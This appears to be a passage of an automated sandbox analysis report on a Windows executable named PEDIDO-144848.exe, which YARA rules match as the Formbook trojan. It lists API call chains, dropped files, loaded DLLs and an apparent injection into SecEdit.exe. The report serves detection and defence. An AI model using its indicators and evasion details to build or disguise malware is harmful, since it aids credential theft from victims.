        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403180
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile created: C:\Windows\Fonts\prelegacyJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile created: C:\Windows\Fonts\prelegacy\prsterJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_004049360_2_00404936
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCA6C02_2_36CCA6C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0C6E02_2_36C0C6E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C836EC2_2_36C836EC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCF6F62_2_36CCF6F6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C106802_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBD6462_2_36CBD646
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C346702_2_36C34670
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2C6002_2_36C2C600
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAD62C2_2_36CAD62C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC67572_2_36CC6757
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1A7602_2_36C1A760
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C127602_2_36C12760
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C104452_2_36C10445
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCF5C92_2_36CCF5C9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC75C62_2_36CC75C6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDA5262_2_36CDA526
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFD2EC2_2_36BFD2EC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC124C2_2_36CC124C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C013802_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1E3102_2_36C1E310
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCF3302_2_36CCF330
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1B0D02_2_36C1B0D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC70F12_2_36CC70F1
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C4508C2_2_36C4508C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C000A02_2_36C000A0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBE0762_2_36CBE076
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C151C02_2_36C151C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2B1E02_2_36C2B1E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C5717A2_2_36C5717A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD010E2_2_36CD010E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAD1302_2_36CAD130
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC9ED22_2_36CC9ED2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C02EE82_2_36C02EE8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC0EAD2_2_36CC0EAD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C11EB22_2_36C11EB2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C52E482_2_36C52E48
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C30E502_2_36C30E50
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CB0E6D2_2_36CB0E6D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC1FC62_2_36CC1FC6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C16FE02_2_36C16FE0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCEFBF2_2_36CCEFBF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCFF632_2_36CCFF63
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1CF002_2_36C1CF00
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C28CDF2_2_36C28CDF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2FCE02_2_36C2FCE0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDACEB2_2_36CDACEB
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CA9C982_2_36CA9C98
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBEC4C2_2_36CBEC4C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C13C602_2_36C13C60
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC6C692_2_36CC6C69
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCEC602_2_36CCEC60
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C00C122_2_36C00C12
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1AC202_2_36C1AC20
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C19DD02_2_36C19DD0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAFDF42_2_36CAFDF4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C22DB02_2_36C22DB0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC7D4C2_2_36CC7D4C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10D692_2_36C10D69
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0AD002_2_36C0AD00
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCFD272_2_36CCFD27
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCFA892_2_36CCFA89
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2FAA02_2_36C2FAA0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCEA5B2_2_36CCEA5B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCCA132_2_36CCCA13
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C84BC02_2_36C84BC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10B102_2_36C10B10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C4DB192_2_36C4DB19
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCFB2E2_2_36CCFB2E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C128C02_2_36C128C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC18DA2_2_36CC18DA
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC78F32_2_36CC78F3
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C268822_2_36C26882
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C898B22_2_36C898B2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C198702_2_36C19870
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2B8702_2_36C2B870
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCF8722_2_36CCF872
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C138002_2_36C13800
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E8102_2_36C3E810
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF68682_2_36BF6868
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CB08352_2_36CB0835
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C559C02_2_36C559C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0E9A02_2_36C0E9A0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCE9A62_2_36CCE9A6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690E69D2_2_3690E69D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690D7082_2_3690D708
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690E46D2_2_3690E46D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690E3072_2_3690E307
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690C9B82_2_3690C9B8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_369151E42_2_369151E4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690E1E82_2_3690E1E8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307E3104_2_0307E310
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312F3304_2_0312F330
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030613804_2_03061380
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312124C4_2_0312124C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0305D2EC4_2_0305D2EC
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0305F1134_2_0305F113
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0313010E4_2_0313010E
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0310D1304_2_0310D130
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030B717A4_2_030B717A
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030751C04_2_030751C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308B1E04_2_0308B1E0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0311E0764_2_0311E076
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A508C4_2_030A508C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030600A04_2_030600A0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307B0D04_2_0307B0D0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031270F14_2_031270F1
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031267574_2_03126757
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030727604_2_03072760
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307A7604_2_0307A760
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308C6004_2_0308C600
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0310D62C4_2_0310D62C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0311D6464_2_0311D646
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030946704_2_03094670
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030706804_2_03070680
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312A6C04_2_0312A6C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030E36EC4_2_030E36EC
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312F6F64_2_0312F6F6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0306C6E04_2_0306C6E0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0313A5264_2_0313A526
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031275C64_2_031275C6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312F5C94_2_0312F5C9
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030704454_2_03070445
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030DD4804_2_030DD480
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030ADB194_2_030ADB19
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03070B104_2_03070B10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312FB2E4_2_0312FB2E
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030E4BC04_2_030E4BC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312CA134_2_0312CA13
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312EA5B4_2_0312EA5B
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312FA894_2_0312FA89
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308FAA04_2_0308FAA0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0306E9A04_2_0306E9A0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312E9A64_2_0312E9A6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030B59C04_2_030B59C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030738004_2_03073800
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0309E8104_2_0309E810
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031108354_2_03110835
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312F8724_2_0312F872
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030568684_2_03056868
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030798704_2_03079870
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308B8704_2_0308B870
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030E58704_2_030E5870
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030868824_2_03086882
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030E98B24_2_030E98B2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030728C04_2_030728C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031218DA4_2_031218DA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031278F34_2_031278F3
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307CF004_2_0307CF00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312FF634_2_0312FF63
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312EFBF4_2_0312EFBF
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03121FC64_2_03121FC6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03076FE04_2_03076FE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030B2E484_2_030B2E48
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03090E504_2_03090E50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03110E6D4_2_03110E6D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03071EB24_2_03071EB2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03120EAD4_2_03120EAD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03129ED24_2_03129ED2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03062EE84_2_03062EE8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0306AD004_2_0306AD00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312FD274_2_0312FD27
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03127D4C4_2_03127D4C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03070D694_2_03070D69
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03082DB04_2_03082DB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03079DD04_2_03079DD0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0310FDF44_2_0310FDF4
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03060C124_2_03060C12
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307AC204_2_0307AC20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0311EC4C4_2_0311EC4C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03073C604_2_03073C60
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312EC604_2_0312EC60
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03126C694_2_03126C69
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03109C984_2_03109C98
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03088CDF4_2_03088CDF
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030F7CE84_2_030F7CE8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308FCE04_2_0308FCE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0313ACEB4_2_0313ACEB
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDEEBA4_2_02EDEEBA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDE3074_2_02EDE307
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDE1E84_2_02EDE1E8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDC9B34_2_02EDC9B3
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDE69D4_2_02EDE69D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDD7084_2_02EDD708
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDE46D4_2_02EDE46D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 030DE692 appears 86 times
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 030EEF10 appears 105 times
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 030B7BE4 appears 96 times
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 0305B910 appears 268 times
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 030A5050 appears 36 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: String function: 36C7E692 appears 84 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: String function: 36C8EF10 appears 105 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: String function: 36C45050 appears 36 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: String function: 36C57BE4 appears 88 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: String function: 36BFB910 appears 254 times
        Source: PEDIDO-144848.exeStatic PE information: invalid certificate
        Source: PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003699F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036B51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSeCEditj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036EA0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal96.troj.evad.winEXE@5/7@2/2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403180
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_004043C3 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043C3
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_004020CD LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_004020CD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile created: C:\Program Files (x86)\Fljtenists.iniJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile created: C:\Users\user\slavelivetsJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile created: C:\Users\user\AppData\Local\Temp\nsu7B62.tmpJump to behavior
        Source: PEDIDO-144848.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: PEDIDO-144848.exeReversingLabs: Detection: 23%
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile read: C:\Users\user\Desktop\PEDIDO-144848.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\PEDIDO-144848.exe "C:\Users\user\Desktop\PEDIDO-144848.exe"
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeProcess created: C:\Users\user\Desktop\PEDIDO-144848.exe "C:\Users\user\Desktop\PEDIDO-144848.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeProcess created: C:\Users\user\Desktop\PEDIDO-144848.exe "C:\Users\user\Desktop\PEDIDO-144848.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: mswsock.dllJump to behavior
